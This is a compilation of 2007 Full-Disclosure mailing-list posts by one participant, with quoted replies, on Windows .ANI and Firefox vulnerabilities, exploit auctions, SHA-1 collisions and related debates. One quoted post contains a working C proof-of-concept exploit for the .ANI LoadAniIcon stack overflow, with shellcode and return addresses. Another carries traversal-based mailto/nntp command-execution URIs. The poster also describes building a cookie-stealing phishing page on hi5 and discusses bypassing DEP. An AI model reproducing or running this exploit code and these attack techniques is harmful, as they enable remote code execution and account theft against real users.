Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

2007-07-25 Thread wac

Well I hope the next version won't open 45 internet explorers when I click
the mailto URLs. And that when you download something you don't have the
save button enabled by default (and with that delay to avoid return hits
security things) It should have enabled by default the cancel button.
Instead of everybody having to wait a century to get the save button
activated. Is so broken that way. Ahh and to prevent clicks the dialog
displayed somewhere away from the mouse pointer. Ahh and by default no
having enabled the open with when you download but the save as (somebody can
hit enter without noticing). Hey maybe configurable?

And what about providing in the website some hash over SSL so you can verify
that is was not modified on the fly when you download? I mean encrypting
every download around is simply brain dead but a hash is OK. Hey what about
a digital signature you could verify with a public key? Zero overload on
servers ;)

Regards
Waldo Alvarez.

On 7/25/07, Mesut EREN <[EMAIL PROTECTED]> wrote:


 Hi all,

FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5.
But don't work is code.

Example code is

mailto:%00%00../../../../../../windows/system32/cmd<%00%00../../../../../../windows/system32/cmd>".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

Where i missing?

Mesut EREN
BAŞAK ÇATI & CEPHE SİSTEMLERİ
Bilgi İşlem Sorumlusu

MCSA:S,MCSE:S,CEH,CCNA

[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

2007-07-09 Thread wac

On 7/8/07, jt5944-27a <[EMAIL PROTECTED]> wrote:

thank you? okay - thank you for creating this wonderful software

that we use. thank you for listening to our defect requests and
thank you for addressing them in a meaningful time frame. but thank
you for finding bugs? are you on drugs?



Drugs? What are you talking about? That is completely off-topic. A hit that
bounces back to yourself.

they didnt ask you to look for defects. this sounds like those

people who paint house numbers on your curb and then want to be
paid even through you never said to paint the numbers. or those
windshield washers who want you to pay them for smearing your
window when you didnt ask for it. the only people who should be
paid to find vulnerabilities are the people asked to find
vulnerabilities.



What about those who come right into your face without even trying to find
them? Hey we know how software works. We are all using it and we can think.
And sometimes we can track them down too. Don't forget that.

And what about those bugs that are created on purpose. A trojanized
software or device is too obvious (remember NSA-Crypto AG). But a security
bug. Well "sorry we made a mistake we are providing a fix". However can
serve the same purpose as a trojan horse. They simply can know earlier and
fix it later if something goes "out of control". That could explain why
fixes take so much time sometimes and why there are so many bugs. (Just a
theory with some base).

No, ppl searching for vulnerabilities should not be only the ones asked to
do it. Should be every third party around. And guess what. It is being done
right now for whatever purpose. Won't be better if they are sold in the
public light than in the shadows? At least we know what is flawed otherwise
not even a clue. You are right now only looking at the top of the iceberg.
After looking at that website and looking at yahoo messenger 8.1 being on
sale I am considering not to use it for a while or put it under a protection
layer or use alternatives. Why? Somebody else could have found that too and
could be using it. And if somebody asks my opinion to install some soft
listed there I would tell them not to do it because it is not safe. That
means security after all. And if they make money. Then good. Somebody that
knows how to find them was rewarded and encouraged to do more research.
Something you "forgot" to do before distributing to ppl. Yep cutting the
bill putting ppl under risk. That reminds me cars that exploded because of
bad design and ppl becoming ill with cancer or something else by feeding
chickens with hormones and stuff like that. On the other side I am pretty
sure that those grey foreigners you all talk about already have their own
working teams and already have undisclosed technology. The one you don't
know. You better favor research so you can put the finger on the hole before
water begins to flow.

But using your very own "who asked you". I could reply also to you. Who
asked you to make a software/service/device? Yet more who asked you to make
something that is broken? But yet more who asked you to make something that
is broken and that you sell/provide as if it is good? But then I don't want
to reply to you that way because I understand that things needs to be done
even if nobody asks for them. That also applies to security research. Hey
many times people doesn't ask because they simply ignore things.

And about the windshield washers. Well you could understand that they are
usually ppl with extreme need for some cash (otherwise they wouldn't be
doing that) many times just to eat while you drive your fancy car. You could
be more human than that. If I were in that situation and I have some cash
and some of them smear my windshield I would not be poorer/richer for giving
them something. That would make me a lot better than you.

After all they are working, not robbing/assaulting ppl on the streets or
hitting your neck to steal your wallet. Or do you prefer that? They have the
right to live too and you are pushing them to find desperate alternatives.
That's what is wrong. And since you are simply taking the example to compare
it with security research then take it back to the original example, compare
and "see" for yourself.

should we pay burglars for breaking into our homes?


No we could pay key makers that know when your lock can be broken so a
burglar doesn't break into your home. That's quite different. You will be
paying for your own security. Hey burglars are already paying for that and
you are only complaining. Doing it is not going to change anything. Don't
you think is better to try new or better alternatives? Even if that means
that you will make a little less money or that it will cost you a little
extra?

and what about

open source projects? should nonprofit groups be forced to pay for
defects that they never asked people to look for?



Good point but I already have a couple of answers to you because that
crossed my mind too.

1- Open Source !

Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

2007-07-08 Thread wac

On 7/8/07, Dave Hull <[EMAIL PROTECTED]> wrote:


On 7/8/07, ascii <[EMAIL PROTECTED]> wrote:
>
> Dave Hull wrote:
> > Yep. This is nothing new (and nothing noble), there are at least a
> > handful of web sites that will buy zero days.
> >
> > Maybe we should start zeBay.
>
> Because you are noble? Or to start something new?
>

That was a joke. I thought it was obvious.

The vulnerability researchers that I know and respect have been practicing
responsible full disclosure for years. They aren't in the business of
finding vulnerabilities so they can sell them.



Maybe they don't need the money. I can bet you that there are more that need
it than those that doesn't.

Responsible full disclosure moves the software industry forward and helps us

all.



Why not encourage research? Companies make a lot of money selling
soft/hard/systems or giving tech support for the very same broken thing. I
think that also non security related bug hunting should be encouraged. And
if it is sold to the biggest bidder then those companies will have to put
more in the research or pay the information or be responsible for their own
broken code and the result of letting that information to fall in wrong
hands by not buying it. Unpatched holes are being sold every day and nobody
knows. At least with an open market everybody can know what is around and
even take countermeasures. By not using the software/hardware/system for a
while for example. You call security what we have today? Is so distant.
Companies make sometimes millions and usually do not want to pay a little
misery for things. Just sell broken things and then wait until somebody
takes care to find broken stuff. They simply don't care about that. Only
take action after something is found and there is public pressure. And
sometimes not even knowing the information. Don't you think it would be a
good idea to push them a little to do something for they very own clients?
Hey that means you too.

I believe that's more noble than selling them to the highest bidder,


Is more noble to reward hard to do work that also requires a lot of
knowledge which sometimes people does even takes time to even say "thank
you".

but I understand some people have to put food on their families.


You are completely right. And not only food. Hardware and software can be
sometimes very expensive. Definitely is a kind of job that require
resources, just to save more somewhere else.

And don't worry about that website. It will never work being so close. A
market is where everybody can buy/sell. That's far from it.

Regards
Waldo

--

[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Rutkowska faces ‘100% unde tectable malware’ challenge, teasing?

2007-07-01 Thread wac

Blah blah blah. Please someone tell Rokowska that we know about what she
calls "blue pill" since we where little kids.

It was exposed *years ago* (1995 to be exact > 12 years) by Mark A. Ludwig
in his Giant Book of Computer viruses Page 391 from American Eagle
Publications, Inc. Chapter "Protected mode stealth"

Basically was moving the operating system into userland and running the
virus in ring-0 making it almost undetectable. It was called Isnt not blue
whatever. Yes well with vanderpool technology should be a lot easier given
the hardware support.

And guess what.. We are still alive even with a POC virus and it's source
code available to the public.

I hate that kind of noisy sensationalist press so much. That guy is always
doing it.
And btw I don't believe such thing to be totally undetectable. There's
always a little catch.

Regards
Waldo


On 6/30/07, Bipin Gautam <[EMAIL PROTECTED]> wrote:


hi guys,

ref: http://blogs.zdnet.com/security/?p=334

so are they teasing by making her the impossible challenge at this date?
:)

honeypot developers have been trying to battle the same issue of
making the virtual machine emulate guest OS like the it is run in real
hardware since some years now.

ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf


But if Rutkowska or anyone is able to succeed to make it undetectable
in current hardware that would be genius!

-bipin

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fight Censorship on Full-Disclosure

2007-05-13 Thread wac

On 5/12/07, Dr. Neal Krawetz PhD <[EMAIL PROTECTED]> wrote:



Hello all,

It was brought to my attention that this list has become moderated.



Moderated? Is that correct? Please let me know. I once saw once something
strange. An mail sent to the list months ago bouncing back to me.

As a community, we must not stand for this!  We must join together and

fight the oppression.



Calling for war is bad. Sometimes.

I have decided to host a mirror of the censored materials on my website.

As an American, I value free speech above all else, and will gladly give
my life defending this content.



Great then about the free speech.

George Bush, you can kiss my ass.  I didn't vote for you, and as far as

I am concerned you are not my president and no matter how many of my
Muslim brothers you massacre, I will not be intimidated and I will not
remove this content from my website.



?

Everyone, please download the following file and mirror it where ever

you can.  While it may seem cruel to the individuals named in here,
remember the greater good.  George Bush and his Marxist ways have no
place here on our good list.




http://www.krawetz.org/misc/censorship.txt


What is that about? I mean some addresses of someone. What is that? A fake
list of ppl or what?  Could you please explain seems to me like something
written by a kid.

*00* intr0duktion -- ~el8 TEaM

Maybe then we'll listen.

- neal

"I am the last free man in America." - Dr. Neal Krawetz, PhD



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INVASION OF THE CHILD HACKERS

2007-04-16 Thread wac

On 4/16/07, Stack Smasher <[EMAIL PROTECTED]> wrote:


My daughter is 3 and she has had a laptop of her own since she was 2. You
would be amazed at how much more she likes going to the 6-7 sites I have
bookmarked for her then watching TV. Sesame Street and Nick Jr. are her most
favorite. My parents where over a few weeks ago and where shocked when she
not only plugged in the laptop into the wall socket, but turned it on and
went to her favorite web page. Needless to say when she goes to school she
will probably know more than her instructor, I believe that there is a huge
"digital divide" in the world and I want to make sure my child is
comfortable with technology that is CRITICAL for her success in the future.



Or... her complete failure. Someday the little child could be hitting warez,
mscracks, crackspider or maybe rotten.com (just to mention some of the most
known) going just out there or a more strange address you are not aware of
to look for the key to run that little great game that refuses to run
because is protected and... Guess what he/she will see ;)

I really doubt that a 3 years old kid (and I definitely don't believe in
that number 2 you said can even type at the keyboard) can handle that
avalanche of pornography and violence without burning/twisting their little
brain. If I where a parent I would wait a little more time until that
technology could be maybe critical as you call it instead of playing the
geek parent that teaches his kid to go earlier. Nope filters are not very
smart and the internet is WILD and only takes a couple of clicks before you
land on a very strange place. And we all know that. Given the fact that now
there is even emulation on that Is really scary the little monsters that are
being built out there. Hey sometimes I can't even handle rotten.com and I am
not a teen since quite some time ago. Some day I just decided not to visit
that website anymore imagine a little kid's brain. Hey you could even
misspell Yahoo or Google and get hacked or get the avalanche in front of
your face. Or maybe type some random stuff into a search engine. Guess what,
robots are not smart enough to get that kind of stuff out if their index and
believe me those guys are busier taking out competence and copyrighted
material out of the index than actually caring about taking out that kind of
content. Ohh I forgot, you can also download an exe and execute a little
*program* that automatically tells you enjoy hot fresh hotties. Sure no
problem the little hacker will be able to debug it before that happens
right? Ohh yeahh I forgot the antivirus will be smart enough to catch a
modified version of morphine or  Yoda's protector ;)

Regards
Waldo

On 4/16/07, Dr. Neal Krawetz, PhD <[EMAIL PROTECTED]> wrote:

>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> I just came across this article: More Women Online. The article
> starts by saying:
>
> eMarketer estimates that there will be an estimated 97.2
> million female Internet users ages 3 and older in 2007, or 51.7% of
> the total online population. In 2011, 109.7 million US females will
> go online and amounting to 51.9% of the total online population.
>
> Estimates from other research sources concur that females
> represent the majority of US Internet users, ranging from 53%
> (Arbitron and Edison Media Research and for Internet users ages 12
> and older) down to 50.6% (comScore Media Metrix and for Internet
> users ages 2 and older).
>
>
> The increase in women online is only moderately interesting.
> Particularly since surveys from a year ago reported that a majority
> of Internet users under 30-years-old are female.
>
> However and the thing that really got my attention was the age
> range. They say "ages 3 and older". What kind of 3-year-old is
> surfing the web and using IM, and sending email? Between 3 and 5
> years old and most children are just starting to learn the
> alphabet. The average 5-year-old should be able to read simple
> words. Granted, there are some online games for tots and is that
> really the same as using the Internet? (Use a VCR or DVD player?
> Sure and I've seen 2-year-olds do that… But a tot surfing the web?
> Really?)
>
> All of this makes me wonder… How soon before the RIAA begins suing
> 3-year-olds for illegal downloads? I mean and they have already
> gone after a 7-year-old. (And the 7-year-old was female.
> Coincidence? I think not!)  Also, with this many young females
> online, I might need to trade my significant other M. in for a more
> attractive model.  ;-)
>
> EHAP WATCH OUT!
>
> - - Dr. Neal Krawetz
> Author of "Advanced Desktop Window Resizing Techniques in Ubuntu"
>
>
> -BEGIN PGP SIGNATURE-
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 2.5
>
> wpwEAQECAAYFAkYjcY8ACgkQDpFP8dW5K4ZbCgP/c5Tqp/4Z6QE6FB43gvasKxwm3KA4
> 66zC/HjQMM5jC/SxMBHk759K/q9dq9nVv4oaR1Osg1rYrctiLE4aEwPSVzBW9OHNLQKH
> Hq97z7LYpORPqYz3mq2VHtlFZ0nzyxucrR8iFlKRONmG3XH5ayIB4ByEr/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-08 Thread wac

Hello:

Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
remember exactly what it did but it behaved in a strange way I believe some
file handle was left open and had to kill it the hard way. I don't know what
they say in the docs but if it ends up calling the user32 function and
that's all it takes to trigger the bug. I was taking a peek at it's import
tables and It imports from User32 the function LoadCursorA maybe that could
be the guilty one.

anyway test here and see what happens (that link is from dev code)

http://sicotik.com/ink/test.html

I'm not vulnerable anymore since quite some time ;) and I don't have much
time to test right now

Regards
Waldo

On 4/8/07, Michal Majchrowicz <[EMAIL PROTECTED]> wrote:


Hi.
There are more and more reports about FF and ani vulnerability.
There was already a presentation of working exploit.
The thing starts to annoy me and since I am far away from any windows
I wanted to share some of my speculations.
According to docs two things are obvious:
1) Firefox doesn't support ANI cursors
2) ANI is just few cur cursors packed together and presented as an
animation.
So i have three possible ways of exploiting it:
1) Since ANI files are vulnerable then maybe cur files are also
vulnerable. Firefox does support CUR files.
2) If firefox doesn't support ANI files it only means it doesn't
render them. It doesn't mean it will not acept them in any way:)
3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
Then FF will call win api with this cursor. Windows API will recognize
this as ANI file and call vulnerable function .
As I said before these are just speculation. I hope someone will be
able to confirm or prove that some of them (or all) have no sense.
Happy Easter to everyone.
Regards Michal.

On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> >That's correct, Firefox doesn't support ANI files for cursors.
>
> Right, and it doesn't need to, because cursors are not the only way to
reach the vulnerable code.
> Icons can do it, too.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows .ANI LoadAniIcon third party patch latest version 0.3 (so people can rollback their system before applying the patches)

2007-04-03 Thread wac

Hello:

I see that today I'm getting downloads from the website. Incredible
yesterday (1:27 am here in -5 GMT) got more than the first day. Well anyway
that could be maybe because people doesn't know that the Microsoft patch is
out there or... just want to see. Who knows? Well previous versions were not
completely finished since they didn't contained the unpatch part (however
seems that was usefull for some people since got no complaints and some
downloads(93) after the first release) However I have no idea of how many
people is using it, I assume that should be more than 93 since some
distribution should have taken other ways (e-mails, other websites, etc) .
Well If you used the patch and want to uninstall it (I strongly recommend
that), use this version before applying the patch from Microsoft to make
sure everything goes OK, I have no idea if it gives problems or not to apply
the microsoft patch on top of mine. If doing that doesn't gives problems
well was decided to finish it anyway. I am the kind who likes to be sure and
not to take chances as much as possible. By the way you don't need the saved
backup. I am just patching the patched version with the original bytes. That
should make ppl loose less time (no need to search for the backup) while
doing the restoration ;). I did it that way too since was not going to take
me much time as it was basically the same. I just copied that code instead
of making a function buy hey ... who cares? And.. yes string handling should
be pretty broken in the two latest versions but again. Who cares? There was
no time for that with a worm out there infecting even banks. Yes I know a
couple that use windows in their servers and in internal networks I hope
that they are all up to date by now but I doubt it. Sometimes years later
you see the vulnerability in some places. Enough talk for now, let me know
if something is wrong to fix it, or...  fix it yourself. I gotta sleep.

binaries here:
http://aircash.sourceforge.net/micro-distro-0.3-bin.zip

sources here:
http://aircash.sourceforge.net/micro-distro-0.3-src.zip

Regards
Waldo Alvarez
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] another .ani 0-day bug third party patcher more usefull this time, version 0.2

2007-04-03 Thread wac

Get it here

binary:
http://aircash.sourceforge.net/micro-distro-0.2-bin.zip

sources:
http://aircash.sourceforge.net/micro-distro-0.2-src.zip


Regards
Waldo Alvarez
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] More information on ZERT patch for ANI 0day

2007-04-02 Thread wac

Well I did my patch and I'm giving it away to be modifiable by everyone out
there.

I did it for version 5.1.2600.2622 of user32.dll, English version not sure
if that is the last version from M$ (with the way they handle patches you
know
you could miss one) anyway in any case I believe there is enough information
in the sources if it needs a fix or... not if Microsoft really comes with a
patch
tomorrow. So far you don't have to be at the mercy of the chinese worm or
evil random
cracker. Let me know if is a POS if has bugs etc... Maybe is not needed by
tomorrow
but was already doing it. So if it helps.. Then great!!

download binaries here
http://aircash.sourceforge.net/micro-distro-src.zip

and sources here
http://aircash.sourceforge.net/micro-distro-bin.zip

just my 2 cents

Regards
Waldo

On 4/1/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


Hi, more information about the patch released April 1st can be found here:

http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party
patch.

The newly discovered zero-day vulnerability in the parsing of animated
cursors is very similar to the one previously discovered by eEye that was
patched by Microsoft in MS05-002. Basically an "anih" chunk in an animated
cursor RIFF file is read into a stack buffer of a fixed size (36
bytes) but the actual memory copy operation uses the length field provided
inside the "anih" chunk.giving an attacker an easy route to overflow the
stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the
chunk before copying it to the buffer. However, they neglected to audit
the rest of the code for any other instances of the vulnerable copy
routine. As it turns out, if there are two "anih" chunks in the file, the
second chunk will be handled by a separate piece of code which Microsoft
did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the
latest exploit from working, it doesn't fix the flawed copy routine. It
simply requires that any cursors loaded must reside within the Windows
directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should
successfully mitigate most "drive-by's," but might be bypassed by an
attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the
vulnerability, by ensuring that no more than 36 bytes of an "anih" chunk
will be copied to the stack buffer, thus eliminating all potential exploit
paths while maintaining compatibility with well-formatted animated cursor
files.

Gadi.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread wac

On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?



Yes, winhex uses the function when you open the .ani and I don't have it
running with DEP turned on and the same goes for firefox that also leaves
the file openend when I openen  web link dev sent me (already tested winhex
with the address of exitprocess that btw seems to float around from system
to system since the version dev sent me does not works for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
Just ideas for now.

Larry Seltzer

eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-31 Thread wac

Hello:

Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
immune (not even crashing). XP  Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:


/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack
overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which
could
* be exploited by remote attackers to execute arbitrary commands
by
*tricking a user into visiting a malicious web page or viewing an
email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include 

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe  ";

typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;

if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}

printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1
);

printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;

Re: [Full-disclosure] hi5 Antiphishing Departement

2007-03-25 Thread wac

Yep it works. I cloned that and modified it to mail me the user cookie see
http://bottester.hi5.com You have to be logged to make it work ok. Sometimes
doesn't works correctly, it takes you to the home page. Try several times.
No idea why. Sometimes when you modify your profile in hi5 you have to do it
two or three times until it works. Maybe they have some broken code when
updating the database. Adding the subject seems to break it, anyway works
well as a phishing attack since you can tell the user to fill that field.

On 3/24/07, beNi <[EMAIL PROTECTED]> wrote:


I felt the need to extend the list of Antiphishing Departements of some
"Social Networks", so the "Myspace Antiphishing Departement" (
http://www.myspace.com/antiphishing ) got another friend,
the "hi5 Antiphishing Departement" ( http://antiphishing.hi5.com ).

Full blog post is available here:
http://mybeni.rootzilla.de/mybeNi/2007/hi5_antiphishing_departement/

--
benjamin "beNi" flesch
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi

(coolest guy in da hood)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-25 Thread wac

Hello:

On 3/24/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


On Sat, 24 Mar 2007 11:48:10 CDT, wac said:

> Of course not, is enough to find a collision and you'll get for example
a
> message signed by somebody else that looks completely authentic since
> signatures encrypt that hash with the private key.

No, if you have a signature to some text, you need to find a collision to
a
specified value - the one the signature covers.



That is what I mean. If original hash was 0x1234 (assuming 16 bits) and you
want a signed text that looks signed by the private keys holder you have to
construct a text with the same 0x1234 hash. There is where collisions would
come into the game.

For instance, if you have

a 16 bit hash, finding two texts that both have a hash value of 0x1F6E
doesn't
do you much good if the signature is for 0x4ED2.  And due to the birthday
paradox, finding any pair of colliding hashes is a lot easier than finding
a collision to a specific hash.



We are assuming that it was cracked right? I believe that it means if you
can find something let's call it Y that has the same output from the hash
function as the original H(X) = H(Y) let's call the original signed content
X. Of course does not seems to me that SHA-1 was cracked, it was IMHO at
most "weakened" and some collision was found but to call it cracked is
well... too strong. In my opinion is a claim made by the one who claims it
to be famous or something twisting a little the truth. To me something half
true is a lie. Also I was not referring of course to find a pair of
colliding hashes since that would be pointless (yes well maybe has some use
who knows). We all know that they collide and collisions exist. The pigeon
hole principle right? BTW somebody has a paper where that "SHA-1 crack" is
clearly explained? I would like to read it and not trust such claims just
because somebody says so (I don't mean that is not true just want to think
by myself, it could be possible that some rounds could be... well...
simplified). Haven't found any paper about it. Just things like this
http://theory.csail.mit.edu/~yiqun/shanote.pdf that just gives a collision
example. But nothing about the weaknesses of the algorithm. And this is old
news. BTW very interesting that birthday paradox.

And being able to force a collision to a specific hash may not be very

useful all by itself - for instance, if you're trying to collide the hash
that the PGP signature covers in this message, you *might* be able to find
a string of bits.  But you won't be able to make it a *plausible*
signature
